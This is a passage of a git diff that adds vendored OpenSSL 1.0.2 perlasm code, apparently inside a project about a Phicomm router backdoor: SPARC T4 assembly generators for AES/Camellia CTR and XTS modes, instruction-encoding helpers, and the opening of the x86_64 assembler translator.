+
+	ret
+	restore
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+.align	32
+.L${bits}_ctr32_blk:
+	add	$out, $len, $blk_init
+	and	$blk_init, 63, $blk_init	! tail
+	sub	$len, $blk_init, $len
+	add	$blk_init, 15, $blk_init	! round up to 16n
+	srlx	$len, 4, $len
+	srl	$blk_init, 4, $blk_init
+	sub	$len, 1, $len
+	add	$blk_init, 1, $blk_init
+
+.L${bits}_ctr32_blk_loop2x:
+	ldx		[$inp + 0], %o0
+	ldx		[$inp + 8], %o1
+	ldx		[$inp + 16], %o2
+	brz,pt		$ileft, 5f
+	ldx		[$inp + 24], %o3
+
+	ldx		[$inp + 32], %o4
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	or		%g1, %o0, %o0
+	sllx		%o1, $ileft, %o1
+	srlx		%o2, $iright, %g1
+	or		%g1, %o1, %o1
+	sllx		%o2, $ileft, %o2
+	srlx		%o3, $iright, %g1
+	or		%g1, %o2, %o2
+	sllx		%o3, $ileft, %o3
+	srlx		%o4, $iright, %o4
+	or		%o4, %o3, %o3
+5:
+	xor		%g5, %l7, %g1		! ^= rk[0]
+	add		%l7, 1, %l7
+	movxtod		%g1, %f2
+	srl		%l7, 0, %l7		! clruw
+	xor		%g5, %l7, %g1
+	add		%l7, 1, %l7
+	movxtod		%g1, %f6
+	srl		%l7, 0, %l7		! clruw
+	prefetch	[$inp + 32+63], 20
+___
+$::code.=<<___ if ($alg eq "aes");
+	aes_eround01	%f16, %f14, %f2, %f8
+	aes_eround23	%f18, %f14, %f2, %f2
+	aes_eround01	%f16, %f14, %f6, %f10
+	aes_eround23	%f18, %f14, %f6, %f6
+___
+$::code.=<<___ if ($alg eq "cmll");
+	camellia_f	%f16, %f2, %f14, %f2
+	camellia_f	%f16, %f6, %f14, %f6
+	camellia_f	%f18, %f14, %f2, %f0
+	camellia_f	%f18, %f14, %f6, %f4
+___
+$::code.=<<___;
+	call		_${alg}${bits}_encrypt_2x+16
+	add		$inp, 32, $inp
+	subcc		$len, 2, $len
+
+	movxtod		%o0, %f8
+	movxtod		%o1, %f10
+	movxtod		%o2, %f12
+	fxor		%f8, %f0, %f0		! ^= inp
+	movxtod		%o3, %f8
+	fxor		%f10, %f2, %f2
+	fxor		%f12, %f4, %f4
+	fxor		%f8, %f6, %f6
+
+	stda		%f0, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f2, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f4, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f6, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	bgu,pt		$::size_t_cc, .L${bits}_ctr32_blk_loop2x
+	add		$out, 8, $out
+
+	add		$blk_init, $len, $len
+	andcc		$len, 1, %g0		! is number of blocks even?
+	membar		#StoreLoad|#StoreStore
+	bnz,pt		%icc, .L${bits}_ctr32_loop
+	srl		$len, 0, $len
+	brnz,pn		$len, .L${bits}_ctr32_loop2x
+	nop
+
+	ret
+	restore
+.type	${alg}${bits}_t4_ctr32_encrypt,#function
+.size	${alg}${bits}_t4_ctr32_encrypt,.-${alg}${bits}_t4_ctr32_encrypt
+___
+}
+
+sub alg_xts_implement {
+my ($alg,$bits,$dir) = @_;
+my ($inp,$out,$len,$key1,$key2,$ivec)=map("%i$_",(0..5));
+my $rem=$ivec;
+
+$::code.=<<___;
+.globl	${alg}${bits}_t4_xts_${dir}crypt
+.align	32
+${alg}${bits}_t4_xts_${dir}crypt:
+	save		%sp, -$::frame-16, %sp
+
+	mov		$ivec, %o0
+	add		%fp, $::bias-16, %o1
+	call		${alg}_t4_encrypt
+	mov		$key2, %o2
+
+	add		%fp, $::bias-16, %l7
+	ldxa		[%l7]0x88, %g2
+	add		%fp, $::bias-8, %l7
+	ldxa		[%l7]0x88, %g3		! %g3:%g2 is tweak
+
+	sethi		%hi(0x76543210), %l7
+	or		%l7, %lo(0x76543210), %l7
+	bmask		%l7, %g0, %g0		! byte swap mask
+
+	prefetch	[$inp], 20
+	prefetch	[$inp + 63], 20
+	call		_${alg}${bits}_load_${dir}ckey
+	and		$len, 15,  $rem
+	and		$len, -16, $len
+___
+$code.=<<___ if ($dir eq "de");
+	mov		0, %l7
+	movrnz		$rem, 16,  %l7
+	sub		$len, %l7, $len
+___
+$code.=<<___;
+
+	sub		$inp, $out, $blk_init	! $inp!=$out
+	and		$inp, 7, $ileft
+	andn		$inp, 7, $inp
+	sll		$ileft, 3, $ileft
+	mov		64, $iright
+	mov		0xff, $omask
+	sub		$iright, $ileft, $iright
+	and		$out, 7, $ooff
+	cmp		$len, 255
+	movrnz		$ooff, 0, $blk_init		! if (	$out&7 ||
+	movleu		$::size_t_cc, 0, $blk_init	!	$len<256 ||
+	brnz,pn		$blk_init, .L${bits}_xts_${dir}blk !	$inp==$out)
+	srl		$omask, $ooff, $omask
+
+	andcc		$len, 16, %g0		! is number of blocks even?
+___
+$code.=<<___ if ($dir eq "de");
+	brz,pn		$len, .L${bits}_xts_${dir}steal
+___
+$code.=<<___;
+	alignaddrl	$out, %g0, $out
+	bz		%icc, .L${bits}_xts_${dir}loop2x
+	srlx		$len, 4, $len
+.L${bits}_xts_${dir}loop:
+	ldx		[$inp + 0], %o0
+	brz,pt		$ileft, 4f
+	ldx		[$inp + 8], %o1
+
+	ldx		[$inp + 16], %o2
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	sllx		%o1, $ileft, %o1
+	or		%g1, %o0, %o0
+	srlx		%o2, $iright, %o2
+	or		%o2, %o1, %o1
+4:
+	movxtod		%g2, %f12
+	movxtod		%g3, %f14
+	bshuffle	%f12, %f12, %f12
+	bshuffle	%f14, %f14, %f14
+
+	xor		%g4, %o0, %o0		! ^= rk[0]
+	xor		%g5, %o1, %o1
+	movxtod		%o0, %f0
+	movxtod		%o1, %f2
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+
+	prefetch	[$out + 63], 22
+	prefetch	[$inp + 16+63], 20
+	call		_${alg}${bits}_${dir}crypt_1x
+	add		$inp, 16, $inp
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+
+	srax		%g3, 63, %l7		! next tweak value
+	addcc		%g2, %g2, %g2
+	and		%l7, 0x87, %l7
+	addxc		%g3, %g3, %g3
+	xor		%l7, %g2, %g2
+
+	brnz,pn		$ooff, 2f
+	sub		$len, 1, $len
+		
+	std		%f0, [$out + 0]
+	std		%f2, [$out + 8]
+	brnz,pt		$len, .L${bits}_xts_${dir}loop2x
+	add		$out, 16, $out
+
+	brnz,pn		$rem, .L${bits}_xts_${dir}steal
+	nop
+
+	ret
+	restore
+
+.align	16
+2:	ldxa		[$inp]0x82, %o0		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f4		! handle unaligned output
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+	stda		%f4, [$out + $omask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $omask, $omask
+	stda		%f8, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .L${bits}_xts_${dir}loop2x+4
+	orn		%g0, $omask, $omask
+
+	brnz,pn		$rem, .L${bits}_xts_${dir}steal
+	nop
+
+	ret
+	restore
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+.align	32
+.L${bits}_xts_${dir}loop2x:
+	ldx		[$inp + 0], %o0
+	ldx		[$inp + 8], %o1
+	ldx		[$inp + 16], %o2
+	brz,pt		$ileft, 4f
+	ldx		[$inp + 24], %o3
+
+	ldx		[$inp + 32], %o4
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	or		%g1, %o0, %o0
+	sllx		%o1, $ileft, %o1
+	srlx		%o2, $iright, %g1
+	or		%g1, %o1, %o1
+	sllx		%o2, $ileft, %o2
+	srlx		%o3, $iright, %g1
+	or		%g1, %o2, %o2
+	sllx		%o3, $ileft, %o3
+	srlx		%o4, $iright, %o4
+	or		%o4, %o3, %o3
+4:
+	movxtod		%g2, %f12
+	movxtod		%g3, %f14
+	bshuffle	%f12, %f12, %f12
+	bshuffle	%f14, %f14, %f14
+
+	srax		%g3, 63, %l7		! next tweak value
+	addcc		%g2, %g2, %g2
+	and		%l7, 0x87, %l7
+	addxc		%g3, %g3, %g3
+	xor		%l7, %g2, %g2
+
+	movxtod		%g2, %f8
+	movxtod		%g3, %f10
+	bshuffle	%f8,  %f8,  %f8
+	bshuffle	%f10, %f10, %f10
+
+	xor		%g4, %o0, %o0		! ^= rk[0]
+	xor		%g5, %o1, %o1
+	xor		%g4, %o2, %o2		! ^= rk[0]
+	xor		%g5, %o3, %o3
+	movxtod		%o0, %f0
+	movxtod		%o1, %f2
+	movxtod		%o2, %f4
+	movxtod		%o3, %f6
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+	fxor		%f8,  %f4, %f4		! ^= tweak[0]
+	fxor		%f10, %f6, %f6
+
+	prefetch	[$out + 63], 22
+	prefetch	[$inp + 32+63], 20
+	call		_${alg}${bits}_${dir}crypt_2x
+	add		$inp, 32, $inp
+
+	movxtod		%g2, %f8
+	movxtod		%g3, %f10
+
+	srax		%g3, 63, %l7		! next tweak value
+	addcc		%g2, %g2, %g2
+	and		%l7, 0x87, %l7
+	addxc		%g3, %g3, %g3
+	xor		%l7, %g2, %g2
+
+	bshuffle	%f8,  %f8,  %f8
+	bshuffle	%f10, %f10, %f10
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+	fxor		%f8,  %f4, %f4
+	fxor		%f10, %f6, %f6
+
+	brnz,pn		$ooff, 2f
+	sub		$len, 2, $len
+		
+	std		%f0, [$out + 0]
+	std		%f2, [$out + 8]
+	std		%f4, [$out + 16]
+	std		%f6, [$out + 24]
+	brnz,pt		$len, .L${bits}_xts_${dir}loop2x
+	add		$out, 32, $out
+
+	fsrc2		%f4, %f0
+	fsrc2		%f6, %f2
+	brnz,pn		$rem, .L${bits}_xts_${dir}steal
+	nop
+
+	ret
+	restore
+
+.align	16
+2:	ldxa		[$inp]0x82, %o0		! avoid read-after-write hazard
+						! and ~3x deterioration
+						! in inp==out case
+	faligndata	%f0, %f0, %f8		! handle unaligned output
+	faligndata	%f0, %f2, %f10
+	faligndata	%f2, %f4, %f12
+	faligndata	%f4, %f6, %f14
+	faligndata	%f6, %f6, %f0
+
+	stda		%f8, [$out + $omask]0xc0	! partial store
+	std		%f10, [$out + 8]
+	std		%f12, [$out + 16]
+	std		%f14, [$out + 24]
+	add		$out, 32, $out
+	orn		%g0, $omask, $omask
+	stda		%f0, [$out + $omask]0xc0	! partial store
+
+	brnz,pt		$len, .L${bits}_xts_${dir}loop2x+4
+	orn		%g0, $omask, $omask
+
+	fsrc2		%f4, %f0
+	fsrc2		%f6, %f2
+	brnz,pn		$rem, .L${bits}_xts_${dir}steal
+	nop
+
+	ret
+	restore
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+.align	32
+.L${bits}_xts_${dir}blk:
+	add	$out, $len, $blk_init
+	and	$blk_init, 63, $blk_init	! tail
+	sub	$len, $blk_init, $len
+	add	$blk_init, 15, $blk_init	! round up to 16n
+	srlx	$len, 4, $len
+	srl	$blk_init, 4, $blk_init
+	sub	$len, 1, $len
+	add	$blk_init, 1, $blk_init
+
+.L${bits}_xts_${dir}blk2x:
+	ldx		[$inp + 0], %o0
+	ldx		[$inp + 8], %o1
+	ldx		[$inp + 16], %o2
+	brz,pt		$ileft, 5f
+	ldx		[$inp + 24], %o3
+
+	ldx		[$inp + 32], %o4
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	or		%g1, %o0, %o0
+	sllx		%o1, $ileft, %o1
+	srlx		%o2, $iright, %g1
+	or		%g1, %o1, %o1
+	sllx		%o2, $ileft, %o2
+	srlx		%o3, $iright, %g1
+	or		%g1, %o2, %o2
+	sllx		%o3, $ileft, %o3
+	srlx		%o4, $iright, %o4
+	or		%o4, %o3, %o3
+5:
+	movxtod		%g2, %f12
+	movxtod		%g3, %f14
+	bshuffle	%f12, %f12, %f12
+	bshuffle	%f14, %f14, %f14
+
+	srax		%g3, 63, %l7		! next tweak value
+	addcc		%g2, %g2, %g2
+	and		%l7, 0x87, %l7
+	addxc		%g3, %g3, %g3
+	xor		%l7, %g2, %g2
+
+	movxtod		%g2, %f8
+	movxtod		%g3, %f10
+	bshuffle	%f8,  %f8,  %f8
+	bshuffle	%f10, %f10, %f10
+
+	xor		%g4, %o0, %o0		! ^= rk[0]
+	xor		%g5, %o1, %o1
+	xor		%g4, %o2, %o2		! ^= rk[0]
+	xor		%g5, %o3, %o3
+	movxtod		%o0, %f0
+	movxtod		%o1, %f2
+	movxtod		%o2, %f4
+	movxtod		%o3, %f6
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+	fxor		%f8,  %f4, %f4		! ^= tweak[0]
+	fxor		%f10, %f6, %f6
+
+	prefetch	[$inp + 32+63], 20
+	call		_${alg}${bits}_${dir}crypt_2x
+	add		$inp, 32, $inp
+
+	movxtod		%g2, %f8
+	movxtod		%g3, %f10
+
+	srax		%g3, 63, %l7		! next tweak value
+	addcc		%g2, %g2, %g2
+	and		%l7, 0x87, %l7
+	addxc		%g3, %g3, %g3
+	xor		%l7, %g2, %g2
+
+	bshuffle	%f8,  %f8,  %f8
+	bshuffle	%f10, %f10, %f10
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+	fxor		%f8,  %f4, %f4
+	fxor		%f10, %f6, %f6
+
+	stda		%f0, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f2, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f4, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	add		$out, 8, $out
+	stda		%f6, [$out]0xe2		! ASI_BLK_INIT, T4-specific
+	bgu,pt		$::size_t_cc, .L${bits}_xts_${dir}blk2x
+	add		$out, 8, $out
+
+	add		$blk_init, $len, $len
+	andcc		$len, 1, %g0		! is number of blocks even?
+	membar		#StoreLoad|#StoreStore
+	bnz,pt		%icc, .L${bits}_xts_${dir}loop
+	srl		$len, 0, $len
+	brnz,pn		$len, .L${bits}_xts_${dir}loop2x
+	nop
+
+	fsrc2		%f4, %f0
+	fsrc2		%f6, %f2
+	brnz,pn		$rem, .L${bits}_xts_${dir}steal
+	nop
+
+	ret
+	restore
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+___
+$code.=<<___ if ($dir eq "en");
+.align	32
+.L${bits}_xts_${dir}steal:
+	std		%f0, [%fp + $::bias-16]	! copy of output
+	std		%f2, [%fp + $::bias-8]
+
+	srl		$ileft, 3, $ileft
+	add		%fp, $::bias-16, %l7
+	add		$inp, $ileft, $inp	! original $inp+$len&-15
+	add		$out, $ooff, $out	! original $out+$len&-15
+	mov		0, $ileft
+	nop					! align
+
+.L${bits}_xts_${dir}stealing:
+	ldub		[$inp + $ileft], %o0
+	ldub		[%l7  + $ileft], %o1
+	dec		$rem
+	stb		%o0, [%l7  + $ileft]
+	stb		%o1, [$out + $ileft]
+	brnz		$rem, .L${bits}_xts_${dir}stealing
+	inc		$ileft
+
+	mov		%l7, $inp
+	sub		$out, 16, $out
+	mov		0, $ileft
+	sub		$out, $ooff, $out
+	ba		.L${bits}_xts_${dir}loop	! one more time
+	mov		1, $len				! $rem is 0
+___
+$code.=<<___ if ($dir eq "de");
+.align	32
+.L${bits}_xts_${dir}steal:
+	ldx		[$inp + 0], %o0
+	brz,pt		$ileft, 8f
+	ldx		[$inp + 8], %o1
+
+	ldx		[$inp + 16], %o2
+	sllx		%o0, $ileft, %o0
+	srlx		%o1, $iright, %g1
+	sllx		%o1, $ileft, %o1
+	or		%g1, %o0, %o0
+	srlx		%o2, $iright, %o2
+	or		%o2, %o1, %o1
+8:
+	srax		%g3, 63, %l7		! next tweak value
+	addcc		%g2, %g2, %o2
+	and		%l7, 0x87, %l7
+	addxc		%g3, %g3, %o3
+	xor		%l7, %o2, %o2
+
+	movxtod		%o2, %f12
+	movxtod		%o3, %f14
+	bshuffle	%f12, %f12, %f12
+	bshuffle	%f14, %f14, %f14
+
+	xor		%g4, %o0, %o0		! ^= rk[0]
+	xor		%g5, %o1, %o1
+	movxtod		%o0, %f0
+	movxtod		%o1, %f2
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+
+	call		_${alg}${bits}_${dir}crypt_1x
+	add		$inp, 16, $inp
+
+	fxor		%f12, %f0, %f0		! ^= tweak[0]
+	fxor		%f14, %f2, %f2
+
+	std		%f0, [%fp + $::bias-16]
+	std		%f2, [%fp + $::bias-8]
+
+	srl		$ileft, 3, $ileft
+	add		%fp, $::bias-16, %l7
+	add		$inp, $ileft, $inp	! original $inp+$len&-15
+	add		$out, $ooff, $out	! original $out+$len&-15
+	mov		0, $ileft
+	add		$out, 16, $out
+	nop					! align
+
+.L${bits}_xts_${dir}stealing:
+	ldub		[$inp + $ileft], %o0
+	ldub		[%l7  + $ileft], %o1
+	dec		$rem
+	stb		%o0, [%l7  + $ileft]
+	stb		%o1, [$out + $ileft]
+	brnz		$rem, .L${bits}_xts_${dir}stealing
+	inc		$ileft
+
+	mov		%l7, $inp
+	sub		$out, 16, $out
+	mov		0, $ileft
+	sub		$out, $ooff, $out
+	ba		.L${bits}_xts_${dir}loop	! one more time
+	mov		1, $len				! $rem is 0
+___
+$code.=<<___;
+	ret
+	restore
+.type	${alg}${bits}_t4_xts_${dir}crypt,#function
+.size	${alg}${bits}_t4_xts_${dir}crypt,.-${alg}${bits}_t4_xts_${dir}crypt
+___
+}
+
+# Purpose of these subroutines is to explicitly encode VIS instructions,
+# so that one can compile the module without having to specify VIS
+# extentions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
+# Idea is to reserve for option to produce "universal" binary and let
+# programmer detect if current CPU is VIS capable at run-time.
+sub unvis {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my ($ref,$opf);
+my %visopf = (	"faligndata"	=> 0x048,
+		"bshuffle"	=> 0x04c,
+		"fnot2"		=> 0x066,
+		"fxor"		=> 0x06c,
+		"fsrc2"		=> 0x078	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+sub unvis3 {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
+my ($ref,$opf);
+my %visopf = (	"addxc"		=> 0x011,
+		"addxccc"	=> 0x013,
+		"umulxhi"	=> 0x016,
+		"alignaddr"	=> 0x018,
+		"bmask"		=> 0x019,
+		"alignaddrl"	=> 0x01a	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%([goli])([0-9])/);
+	    $_=$bias{$1}+$2;
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+sub unaes_round {	# 4-argument instructions
+my ($mnemonic,$rs1,$rs2,$rs3,$rd)=@_;
+my ($ref,$opf);
+my %aesopf = (	"aes_eround01"	=> 0,
+		"aes_eround23"	=> 1,
+		"aes_dround01"	=> 2,
+		"aes_dround23"	=> 3,
+		"aes_eround01_l"=> 4,
+		"aes_eround23_l"=> 5,
+		"aes_dround01_l"=> 6,
+		"aes_dround23_l"=> 7,
+		"aes_kexpand1"	=> 8	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rs3,$rd";
+
+    if (defined($opf=$aesopf{$mnemonic})) {
+	$rs3 = ($rs3 =~ /%f([0-6]*[02468])/) ? (($1|$1>>5)&31) : $rs3;
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			2<<30|$rd<<25|0x19<<19|$rs1<<14|$rs3<<9|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+sub unaes_kexpand {	# 3-argument instructions
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my ($ref,$opf);
+my %aesopf = (	"aes_kexpand0"	=> 0x130,
+		"aes_kexpand2"	=> 0x131	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if (defined($opf=$aesopf{$mnemonic})) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			2<<30|$rd<<25|0x36<<19|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+sub uncamellia_f {	# 4-argument instructions
+my ($mnemonic,$rs1,$rs2,$rs3,$rd)=@_;
+my ($ref,$opf);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rs3,$rd";
+
+    if (1) {
+	$rs3 = ($rs3 =~ /%f([0-6]*[02468])/) ? (($1|$1>>5)&31) : $rs3;
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			2<<30|$rd<<25|0x19<<19|$rs1<<14|$rs3<<9|0xc<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+sub uncamellia3 {	# 3-argument instructions
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my ($ref,$opf);
+my %cmllopf = (	"camellia_fl"	=> 0x13c,
+		"camellia_fli"	=> 0x13d	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if (defined($opf=$cmllopf{$mnemonic})) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			2<<30|$rd<<25|0x36<<19|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+sub unmovxtox {		# 2-argument instructions
+my ($mnemonic,$rs,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24, "f" => 0 );
+my ($ref,$opf);
+my %movxopf = (	"movdtox"	=> 0x110,
+		"movstouw"	=> 0x111,
+		"movstosw"	=> 0x113,
+		"movxtod"	=> 0x118,
+		"movwtos"	=> 0x119	);
+
+    $ref = "$mnemonic\t$rs,$rd";
+
+    if (defined($opf=$movxopf{$mnemonic})) {
+	foreach ($rs,$rd) {
+	    return $ref if (!/%([fgoli])([0-9]{1,2})/);
+	    $_=$bias{$1}+$2;
+	    if ($2>=32) {
+		return $ref if ($2&1);
+		# re-encode for upper double register addressing
+		$_=($2|$2>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			2<<30|$rd<<25|0x36<<19|$opf<<5|$rs,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+sub undes {
+my ($mnemonic)=shift;
+my @args=@_;
+my ($ref,$opf);
+my %desopf = (	"des_round"	=> 0b1001,
+		"des_ip"	=> 0b100110100,
+		"des_iip"	=> 0b100110101,
+		"des_kexpand"	=> 0b100110110	);
+
+    $ref = "$mnemonic\t".join(",",@_);
+
+    if (defined($opf=$desopf{$mnemonic})) {	# 4-arg
+	if ($mnemonic eq "des_round") {
+	    foreach (@args[0..3]) {
+		return $ref if (!/%f([0-9]{1,2})/);
+		$_=$1;
+		if ($1>=32) {
+		    return $ref if ($1&1);
+		    # re-encode for upper double register addressing
+		    $_=($1|$1>>5)&31;
+		}
+	    }
+	    return  sprintf ".word\t0x%08x !%s",
+			    2<<30|0b011001<<19|$opf<<5|$args[0]<<14|$args[1]|$args[2]<<9|$args[3]<<25,
+			    $ref;
+	} elsif ($mnemonic eq "des_kexpand") {	# 3-arg
+	    foreach (@args[0..2]) {
+		return $ref if (!/(%f)?([0-9]{1,2})/);
+		$_=$2;
+		if ($2>=32) {
+		    return $ref if ($2&1);
+		    # re-encode for upper double register addressing
+		    $_=($2|$2>>5)&31;
+		}
+	    }
+	    return  sprintf ".word\t0x%08x !%s",
+			    2<<30|0b110110<<19|$opf<<5|$args[0]<<14|$args[1]|$args[2]<<25,
+			    $ref;
+	} else {				# 2-arg
+	    foreach (@args[0..1]) {
+		return $ref if (!/%f([0-9]{1,2})/);
+		$_=$1;
+		if ($1>=32) {
+		    return $ref if ($2&1);
+		    # re-encode for upper double register addressing
+		    $_=($1|$1>>5)&31;
+		}
+	    }
+	    return  sprintf ".word\t0x%08x !%s",
+			    2<<30|0b110110<<19|$opf<<5|$args[0]<<14|$args[1]<<25,
+			    $ref;
+	}
+    } else {
+	return $ref;
+    }
+}
+
+sub emit_assembler {
+    foreach (split("\n",$::code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	s/\b(f[a-z]+2[sd]*)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2})\s*$/$1\t%f0,$2,$3/go;
+
+	s/\b(aes_[edk][^\s]*)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*([%fx0-9]+),\s*(%f[0-9]{1,2})/
+		&unaes_round($1,$2,$3,$4,$5)
+	 /geo or
+	s/\b(aes_kexpand[02])\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*(%f[0-9]{1,2})/
+		&unaes_kexpand($1,$2,$3,$4)
+	 /geo or
+	s/\b(camellia_f)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*([%fx0-9]+),\s*(%f[0-9]{1,2})/
+		&uncamellia_f($1,$2,$3,$4,$5)
+	 /geo or
+	s/\b(camellia_[^s]+)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*(%f[0-9]{1,2})/
+		&uncamellia3($1,$2,$3,$4)
+	 /geo or
+	s/\b(des_\w+)\s+(%f[0-9]{1,2}),\s*([%fx0-9]+)(?:,\s*(%f[0-9]{1,2})(?:,\s*(%f[0-9]{1,2}))?)?/
+		&undes($1,$2,$3,$4,$5)
+	 /geo or
+	s/\b(mov[ds]to\w+)\s+(%f[0-9]{1,2}),\s*(%[goli][0-7])/
+		&unmovxtox($1,$2,$3)
+	 /geo or
+	s/\b(mov[xw]to[ds])\s+(%[goli][0-7]),\s*(%f[0-9]{1,2})/
+		&unmovxtox($1,$2,$3)
+	 /geo or
+	s/\b([fb][^\s]*)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*(%f[0-9]{1,2})/
+		&unvis($1,$2,$3,$4)
+	 /geo or
+	s/\b(umulxhi|bmask|addxc[c]{0,2}|alignaddr[l]*)\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
+		&unvis3($1,$2,$3,$4)
+	 /geo;
+
+	print $_,"\n";
+    }
+}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86_64-xlate.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86_64-xlate.pl
new file mode 100755
index 0000000..9c70b8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86_64-xlate.pl
@@ -0,0 +1,1148 @@
+#!/usr/bin/env perl
+
+# Ascetic x86_64 AT&T to MASM/NASM assembler translator by <appro>.
+#
+# Why AT&T to MASM and not vice versa? Several reasons. Because AT&T
+# format is way easier to parse. Because it's simpler to "gear" from
+# Unix ABI to Windows one [see cross-reference "card" at the end of
+# file]. Because Linux targets were available first...
+#
+# In addition the script also "distills" code suitable for GNU
+# assembler, so that it can be compiled with more rigid assemblers,
+# such as Solaris /usr/ccs/bin/as.
+#
+# This translator is not designed to convert *arbitrary* assembler
+# code from AT&T format to MASM one. It's designed to convert just
